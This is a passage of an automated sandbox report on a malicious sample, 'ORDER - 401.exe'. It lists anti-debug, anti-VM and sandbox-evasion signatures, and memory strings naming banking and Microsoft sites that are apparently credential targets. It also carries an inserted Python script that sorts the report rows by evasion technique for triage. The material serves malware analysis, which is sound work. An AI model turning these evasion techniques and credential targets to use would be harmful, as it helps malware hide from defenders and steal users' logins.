                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, tXMW2T9bk0ObJQYFlv.cs | High entropy of concatenated method names: 'bkPqxCcyq6', 'zePqI6mCH6', 'NsAqRXCaB5', 'vYUq9sYOfv', 'fANqAQZgHo', 'X1FqO4mVKk', 'qhsq2uiW5p', 'O5Fqi7OjLQ', 'DIsqK3Yg0E', 'uDtqBWhlkG'
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, BwOqc3zQiesYrVLOFE.cs | High entropy of concatenated method names: 'YaKBICDnNv', 'ji0BRTkAuR', 'FTbB9j2FCb', 'gHsBEU8m2a', 'vhBBFBReaX', 'wTFBhU29Jj', 'rc0BsODaNU', 'ueCBm5JTKb', 'bYYBcSFu21', 'xV3BgkSvxf'
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match | File source: Process Memory Space: ORDER - 401.exe PID: 940, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\ieUnatt.exe | API/Special instruction interceptor: Address: 7FF8C88ED324
                Source: C:\Windows\SysWOW64\ieUnatt.exe | API/Special instruction interceptor: Address: 7FF8C88ED7E4
                Source: C:\Windows\SysWOW64\ieUnatt.exe | API/Special instruction interceptor: Address: 7FF8C88ED944
                Source: C:\Windows\SysWOW64\ieUnatt.exe | API/Special instruction interceptor: Address: 7FF8C88ED504
                Source: C:\Windows\SysWOW64\ieUnatt.exe | API/Special instruction interceptor: Address: 7FF8C88ED544
                Source: C:\Windows\SysWOW64\ieUnatt.exe | API/Special instruction interceptor: Address: 7FF8C88ED1E4
                Source: C:\Windows\SysWOW64\ieUnatt.exe | API/Special instruction interceptor: Address: 7FF8C88F0154
                Source: C:\Windows\SysWOW64\ieUnatt.exe | API/Special instruction interceptor: Address: 7FF8C88EDA44
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Memory allocated: 23F0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Memory allocated: 2550000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Memory allocated: 4550000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Memory allocated: 8870000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Memory allocated: 72A0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Memory allocated: 9870000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Memory allocated: A870000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0105096E rdtsc 5_2_0105096E
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Window / User API: threadDelayed 3289
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Window / User API: threadDelayed 6683
                Source: C:\Users\user\Desktop\ORDER - 401.exe | API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\ieUnatt.exe | API coverage: 2.7 %
                Source: C:\Users\user\Desktop\ORDER - 401.exe TID: 2076 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\ieUnatt.exe TID: 1988 | Thread sleep count: 3289 > 30
                Source: C:\Windows\SysWOW64\ieUnatt.exe TID: 1988 | Thread sleep time: -6578000s >= -30000s
                Source: C:\Windows\SysWOW64\ieUnatt.exe TID: 1988 | Thread sleep count: 6683 > 30
                Source: C:\Windows\SysWOW64\ieUnatt.exe TID: 1988 | Thread sleep time: -13366000s >= -30000s
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe TID: 3180 | Thread sleep time: -65000s >= -30000s
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe TID: 3180 | Thread sleep time: -55500s >= -30000s
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe TID: 3180 | Thread sleep time: -37000s >= -30000s
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Last function: Thread delayed
                Source: C:\Windows\SysWOW64\ieUnatt.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_001BCC50 FindFirstFileW,FindNextFileW,FindClose,8_2_001BCC50
                Source: C:\Users\user\Desktop\ORDER - 401.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: 086604I_P.8.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: 086604I_P.8.dr | Binary or memory string: discord.comVMware20,11696428655f
                Source: 086604I_P.8.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: 086604I_P.8.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: 086604I_P.8.dr | Binary or memory string: global block list test formVMware20,11696428655
                Source: 086604I_P.8.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: ZaZCnGdXtY.exe, 0000000A.00000002.4676883996.000000000133F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllT
                Source: 086604I_P.8.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: 086604I_P.8.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: 086604I_P.8.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: 086604I_P.8.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: 086604I_P.8.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: 086604I_P.8.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: 086604I_P.8.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: 086604I_P.8.dr | Binary or memory string: outlook.office365.comVMware20,11696428655t
                Source: 086604I_P.8.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: firefox.exe, 0000000B.00000002.2768693148.000002D3B892C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 086604I_P.8.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: 086604I_P.8.dr | Binary or memory string: outlook.office.comVMware20,11696428655s
                Source: 086604I_P.8.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: 086604I_P.8.dr | Binary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: 086604I_P.8.dr | Binary or memory string: AMC password management pageVMware20,11696428655
                Source: 086604I_P.8.dr | Binary or memory string: tasks.office.comVMware20,11696428655o
                Source: 086604I_P.8.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: 086604I_P.8.dr | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: 086604I_P.8.dr | Binary or memory string: interactivebrokers.comVMware20,11696428655
                Source: 086604I_P.8.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: 086604I_P.8.dr | Binary or memory string: dev.azure.comVMware20,11696428655j
                Source: 086604I_P.8.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: ieUnatt.exe, 00000008.00000002.4676389465.000000000260A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5%
                Source: 086604I_P.8.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: 086604I_P.8.dr | Binary or memory string: bankofamerica.comVMware20,11696428655x
                Source: 086604I_P.8.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: 086604I_P.8.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0105096E rdtsc
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_00417D83 LdrLoadDll
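The rows in this part of the report (write-watch reservations, the rdtsc function, the long thread delays and sleep loops, the DebugPort queries, the VMware/Hyper-V strings, and the long run of fs:[00000030h] reads that follows) are the raw evidence behind the anti-debug, anti-VM and sandbox-evasion signatures listed in the overview. The script below is an added example, not part of the Joe Sandbox report or of its tooling: it parses rows written as "Source: <origin>[ TID: <n>] | <observation>" (an assumption about how the table flattens), groups them by technique and counts PEB reads per function, so an analyst can turn a few hundred rows like the ones here into a short triage summary. The sample rows are constructed from entries in this report, and the technique labels are the example's own.

```python
import re
from collections import Counter, defaultdict

# Sample rows, constructed from entries in this report and written in the
# "Source: <origin> | <observation>" form assumed for a flattened table row.
SRC_EXE = r"C:\Users\user\Desktop\ORDER - 401.exe"
SRC_INJ = r"C:\Windows\SysWOW64\ieUnatt.exe"
SRC_DR = "086604I_P.8.dr"

SAMPLE_ROWS = [
    f"Source: {SRC_EXE} | Memory allocated: 23F0000 memory reserve | memory write watch",
    f"Source: {SRC_EXE} | Code function: 5_2_0105096E rdtsc",
    f"Source: {SRC_EXE} TID: 2076 | Thread sleep time: -922337203685477s >= -30000s",
    f"Source: {SRC_INJ} TID: 1988 | Thread sleep count: 3289 > 30",
    f"Source: {SRC_EXE} | Process queried: DebugPort",
    f"Source: {SRC_INJ} | Process queried: DebugPort",
    f"Source: {SRC_EXE} | Code function: 5_2_010BE10E mov eax, dword ptr fs:[00000030h]",
    f"Source: {SRC_EXE} | Code function: 5_2_010BE10E mov ecx, dword ptr fs:[00000030h]",
    f"Source: {SRC_EXE} | Code function: 5_2_010BA118 mov eax, dword ptr fs:[00000030h]",
    f"Source: {SRC_DR} | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE",
]

# Row shape: "Source: <origin>[ TID: <n>] | <observation>". The origin is matched
# lazily, so the first " | " after the optional TID splits the two columns.
ROW_RE = re.compile(r"^Source: (?P<src>.+?)(?: TID: (?P<tid>\d+))? \| (?P<obs>.*)$")
# In a 32-bit process fs:[30h] is the TEB's pointer to the PEB; reading it is the
# usual first step of a BeingDebugged / NtGlobalFlag check.
PEB_RE = re.compile(r"Code function: (?P<fn>\S+) mov \w+, dword ptr fs:\[00000030h\]")
RDTSC_RE = re.compile(r"Code function: (?P<fn>\S+) rdtsc\b")
SLEEP_TIME_RE = re.compile(r"Thread sleep time: -(?P<t>\d+)s >= -(?P<thr>\d+)s")
SLEEP_COUNT_RE = re.compile(r"Thread sleep count: (?P<n>\d+) > (?P<thr>\d+)")
# Hypervisor markers worth flagging when they turn up in binary or memory strings.
VM_MARKERS = ("VMware", "Hyper-V", "VirtualBox", "VBOX", "QEMU")


def parse_row(line):
    """Split one report row into (origin, thread id or None, observation)."""
    m = ROW_RE.match(line.strip())
    return None if m is None else (m.group("src"), m.group("tid"), m.group("obs"))


def triage(rows):
    """Bucket report rows by anti-analysis technique; returns plain dicts/lists."""
    peb_reads = defaultdict(Counter)   # origin -> function id -> fs:[30h] reads
    rdtsc = defaultdict(set)           # origin -> function ids that execute rdtsc
    debugport = set()                  # origins that queried their own DebugPort
    long_sleeps, sleep_loops, vm_strings, unparsed = [], [], [], []
    write_watch = Counter()            # origin -> write-watch reservations

    for line in rows:
        parsed = parse_row(line)
        if parsed is None:
            unparsed.append(line)
            continue
        src, tid, obs = parsed
        if m := PEB_RE.search(obs):
            peb_reads[src][m.group("fn")] += 1
        elif m := RDTSC_RE.search(obs):
            rdtsc[src].add(m.group("fn"))
        elif obs == "Process queried: DebugPort":
            debugport.add(src)
        elif m := SLEEP_TIME_RE.search(obs):
            long_sleeps.append((src, tid, int(m.group("t"))))
        elif m := SLEEP_COUNT_RE.search(obs):
            sleep_loops.append((src, tid, int(m.group("n"))))
        elif "memory write watch" in obs:
            write_watch[src] += 1
        elif obs.startswith("Binary or memory string:") and any(k in obs for k in VM_MARKERS):
            vm_strings.append((src, obs.split(": ", 1)[1]))
        else:
            unparsed.append(line)   # rows this example does not classify

    return {
        "peb_reads": {s: dict(c) for s, c in peb_reads.items()},
        "rdtsc": {s: sorted(f) for s, f in rdtsc.items()},
        "debugport": sorted(debugport),
        "long_sleeps": long_sleeps,
        "sleep_loops": sleep_loops,
        "write_watch": dict(write_watch),
        "vm_strings": vm_strings,
        "unparsed": unparsed,
    }


def techniques(summary):
    """Name the technique families present, in the order the buckets are declared."""
    labels = {
        "peb_reads": "anti-debug: PEB read via fs:[30h]",
        "debugport": "anti-debug: DebugPort query",
        "rdtsc": "anti-debug: rdtsc timing",
        "long_sleeps": "sandbox evasion: long sleep",
        "sleep_loops": "sandbox evasion: sleep loop",
        "write_watch": "sandbox evasion: write-watch allocation",
        "vm_strings": "anti-VM: hypervisor strings",
    }
    return [label for key, label in labels.items() if summary[key]]


if __name__ == "__main__":
    result = triage(SAMPLE_ROWS)
    for label in techniques(result):
        print(label)
    for src, fns in result["peb_reads"].items():
        print(f"{src}: {sum(fns.values())} PEB reads in {len(fns)} functions")
```

Feeding the full report into `triage` instead of `SAMPLE_ROWS` turns the 200-odd fs:[00000030h] rows into a per-function count, which is what actually matters for prioritising functions to look at in a disassembler: a function with fifteen PEB reads (such as 5_2_01092349 here) is a better first stop than one with a single read. Rows the example does not recognise land in `unparsed` rather than being silently dropped.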
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010BE10E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010BE10E mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010BE10E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010BE10E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010BE10E mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010BE10E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010BE10E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010BE10E mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010BE10E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010BE10E mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010BA118 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010BA118 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010BA118 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010BA118 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010D0115 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01040124 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010A4144 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010A4144 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010A4144 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010A4144 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010A4144 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010A8158 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01016154 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01016154 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0100C156 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01050185 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010CC188 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010CC188 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010B4180 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010B4180 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0109019F mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0109019F mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0109019F mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0109019F mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0100A197 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0100A197 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0100A197 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010D61C3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010D61C3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0108E1D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0108E1D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0108E1D0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0108E1D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0108E1D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010E61E5 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010401F8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01094000 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010B2000 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010B2000 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010B2000 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010B2000 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010B2000 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010B2000 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010B2000 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010B2000 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0102E016 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0102E016 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0102E016 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0102E016 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0100A020 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0100C020 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010A6030 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01012050 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01096050 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0103C073 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0101208A mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010A80A8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010D60B8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010D60B8 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010920DE mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0100A0E3 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010180E9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010960E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0100C0F0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010520F0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0104A30B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0104A30B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0104A30B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0100C310 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01030310 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01092349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01092349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01092349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01092349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01092349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01092349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01092349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01092349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01092349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01092349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01092349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01092349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01092349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01092349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01092349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0109035C mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0109035C mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0109035C mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0109035C mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0109035C mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0109035C mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010B8350 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010DA352 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010B437C mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0100E388 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0100E388 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0100E388 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0103438F mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0103438F mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01008397 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01008397 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01008397 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010CC3CD mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0101A3C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0101A3C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0101A3C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0101A3C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0101A3C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0101A3C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010183C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010183C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010183C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010183C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010963C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010BE3DB mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010BE3DB mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010BE3DB mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010BE3DB mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010B43D4 mov eax, dword ptr fs:[00000030h]
